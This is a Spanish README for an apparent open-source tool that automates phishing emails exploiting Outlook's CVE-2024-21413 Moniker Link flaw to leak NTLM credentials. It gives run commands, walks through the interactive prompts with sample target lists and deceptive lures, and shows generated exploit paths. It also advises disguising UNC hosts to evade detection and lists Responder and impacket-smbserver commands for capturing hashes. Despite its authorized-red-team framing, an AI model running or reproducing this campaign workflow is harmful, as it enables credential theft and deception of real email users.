
Una herramienta de investigación de seguridad para simular campañas de phishing dirigidas utilizando CVE-2024-21413 (Moniker Link).
Un marco de herramientas de seguridad para simular campañas de phishing dirigidas utilizando la vulnerabilidad CVE-2024-21413 Moniker Link. Diseñado para operaciones de equipo rojo autorizadas, pruebas de penetración y concienciación en seguridad.
BLIND TRUST es un marco de campañas de phishing que ayuda a los equipos de seguridad a comprender y probar sus defensas contra ataques sofisticados basados en correo electrónico. Aprovecha la técnica Moniker Link para eludir la Vista Protegida de Outlook, proporcionando una simulación de ataque realista que las organizaciones pueden utilizar para fortalecer su postura de seguridad.
Esta herramienta automatiza el flujo de trabajo de campaña de extremo a extremo, desde la configuración hasta la entrega de correos electrónicos, manteniendo la seguridad operativa mediante rutas UNC personalizables y opciones de pretexto flexibles.
Las organizaciones necesitan comprender las técnicas de ataque reales para defenderse de manera efectiva. TRUST permite:
.txt estilo wordlist# Clonar el repositorio
git clone https://github.com/h1ssbl1tz/Blind-Trust.git
cd TRUST
# Ejecutar la herramienta
python3 TRUST_v7.py
La herramienta utiliza únicamente módulos de la biblioteca estándar de Python:
getpass - Entrada segura de contraseñas
html - Escape HTML
ipaddress - Validación de direcciones IP
logging - Registro estructurado
os - Operaciones de archivos
re - Expresiones regulares
signal - Manejo de señales
smtplib - Protocolo de correo SMTP
sys - Utilidades del sistema
time - Operaciones de tiempo
dataclasses - Modelado de configuración
email - Construcción de correo MIME
typing - Sugerencias de tipo
No se requieren paquetes externos: funciona en cualquier lugar con Python 3.7+.
python3 TRUST_v7.py
Siga el asistente interactivo a través de 5 pasos:
¿Cargar objetivos desde [f]ile o [i]nput directamente?: i
Dirección(es) de correo del objetivo: [email protected], [email protected]
Asunto del correo [Security Update Required]: Urgente: Aviso de caducidad de contraseña
Nombre mostrado (campo From) [Microsoft Security Center]: Equipo de Seguridad TI
Cuerpo del correo: Su contraseña caduca en 24 horas. Por favor, actualícela inmediatamente.
Host UNC (IP o dominio) [192.168.1.100]: it-internal.company.com
Nombre del recurso compartido UNC [updates]: patches
Nombre del exploit UNC [patch]: kb_security_2024
Cree targets.txt:
# Departamento de Finanzas
[email protected]
[email protected]
[email protected]
# Contabilidad
[email protected]
[email protected]
Luego ejecute:
¿Cargar objetivos desde [f]ile o [i]nput directamente?: f
Ruta al archivo de objetivos: targets.txt
[+] Se cargaron 5 objetivo(s) desde targets.txt
Asunto del correo: Revisión Financiera Q3 - Acción Requerida
Nombre mostrado: Equipo de Operaciones Financieras
Cuerpo del correo: Por favor, revise el estado financiero adjunto del Q3 y proporcione su aprobación.
Host UNC: finance-internal.company.com
Recurso compartido UNC: quarterly
Exploit UNC: q3_financial_report
Ruta UNC generada: file://finance-internal.company.com/quarterly!q3_financial_report
Dos opciones:
.txt con un correo por línea, comentarios que comiencen con #Aquí es donde se evitan firmas obvias:
finance-internal.company.com) en lugar de solo una IPquarterly, updates, documentsq3_report, security_patch, training_documentResultado: En lugar del obvio \\192.168.1.100\share!exploit, se obtiene algo como file://finance-internal.company.com/quarterly!q3_report.
Inicio
↓
[PASO 1] Solicitar correo del atacante y contraseña SMTP
↓
[PASO 2] Solicitar IP del oyente SMB
↓
[PASO 3] Cargar correos de los objetivos (archivo o entrada)
↓
↓→ Para cada objetivo:
│ - Validar formato de correo
│ - Verificar duplicados
│
[PASO 4] Solicitar pretexto del correo
│ - Asunto, nombre From, cuerpo
│
[PASO 5] Solicitar personalización de ruta UNC
│ - Host, recurso compartido, nombre del exploit
│
↓
[CONSTRUIR] Construir objeto de configuración
↓
[VALIDAR] Verificar que todos los campos estén presentes y sean válidos
↓
[RESUMEN] Mostrar resumen previo al envío para revisión
↓
[CONFIRMAR] El usuario aprueba o cancela
↓
[ENVIAR] Para cada objetivo:
│ - Construir correo MIME con enlace Moniker Link personalizado
│ - Intentar entrega SMTP con lógica de reintento
│ - Registrar éxito/fallo por objetivo
│
↓
[INFORME] Mostrar resultados de la campaña (entregados vs fallidos)
↓
Salir
CVE-2024-21413 (Moniker Link) es una vulnerabilidad de Outlook que permite incrustar URL file:// con un carácter !. Cuando un usuario hace clic en dicho enlace, Outlook intenta acceder a la ruta UNC, lo que desencadena un intento de autenticación NTLM incluso en modo Vista Protegida.
\\host\share!exploit! elude la Vista ProtegidaTRUST automatiza la fase de entrega:
Solución: Verifique las credenciales SMTP. Para Gmail, use una contraseña específica de la aplicación. Para correo corporativo, consulte con su administrador SMTP.
Solución: Normal para algunos servidores SMTP. La conexión continuará sin cifrado TLS.
Solución: Asegúrese de que los correos en los archivos wordlist estén completos y tengan un formato válido ([email protected]).
Solución: La dirección de correo no existe en el servidor de destino, o el servidor está bloqueando la retransmisión desde su cuenta.
Solución: Verifique que la ruta del archivo sea correcta y que el archivo exista en su directorio actual.
P: ¿Es legal usar esta herramienta? R: Solo con autorización explícita por escrito de la organización que está probando. El phishing no autorizado es ilegal. Siempre tenga un alcance de trabajo y reglas de participación por escrito.
P: ¿Puede eludir filtros de correo electrónico avanzados? R: Es una simulación realista, pero la seguridad moderna del correo aún puede detectarlo. Ese es el punto: si los filtros de su organización fallan ante esto, tiene un problema que resolver.
P: ¿Por qué personalizar la ruta UNC?
R: El original \\IP\share!exploit es una señal evidente. Los atacantes reales utilizan rutas realistas. Su equipo de seguridad debería detectar tanto indicadores obvios como sutiles.
P: ¿Puedo usarlo para capacitar a empleados? R: Sí. Después de pruebas autorizadas, use ejemplos de campaña anonimizados en la capacitación de concienciación en seguridad para mostrar a los empleados técnicas de ataque reales.
P: ¿Captura credenciales? R: No. TRUST solo entrega el correo. Necesita un oyente SMB aparte (Responder, impacket-smbserver, etc.) para capturar hashes NTLM cuando los objetivos hagan clic en el enlace.
P: ¿Cómo configuro un oyente SMB? R: Use Responder en Linux o impacket-smbserver:
# Responder (captura hashes)
sudo responder -i eth0 -v
# impacket-smbserver (simulación de servidor de archivos)
impacket-smbserver Share /tmp -smb2support
Esta herramienta es solo para pruebas de seguridad autorizadas.
Al usar TRUST, reconoce que comprende las implicaciones legales y tiene la autorización adecuada.
Este proyecto se publica bajo la Licencia MIT con la adición de una restricción de uso. Consulte LICENSE para más detalles.
Este proyecto se basa y está inspirado en la investigación e implementación original de CVE-2024-21413 por CMNatic (https://github.com/cmnatic).
CMNatic merece todo el crédito por:
Este repositorio representa una versión modificada y extendida de ese trabajo, con mejoras que incluyen:
Consulte CREDITS.md para una atribución más detallada.
H1SS - Extendió y mantiene esta versión para fines de investigación de seguridad y pruebas autorizadas.
Las contribuciones son bienvenidas. Asegúrese de que cualquier cambio:
Consulte CONTRIBUTING.md para obtener pautas.
Para problemas, preguntas o sugerencias, abra un issue en GitHub.
Recuerde: Esta herramienta es un proyecto de investigación. Úsela de manera responsable, legal y ética.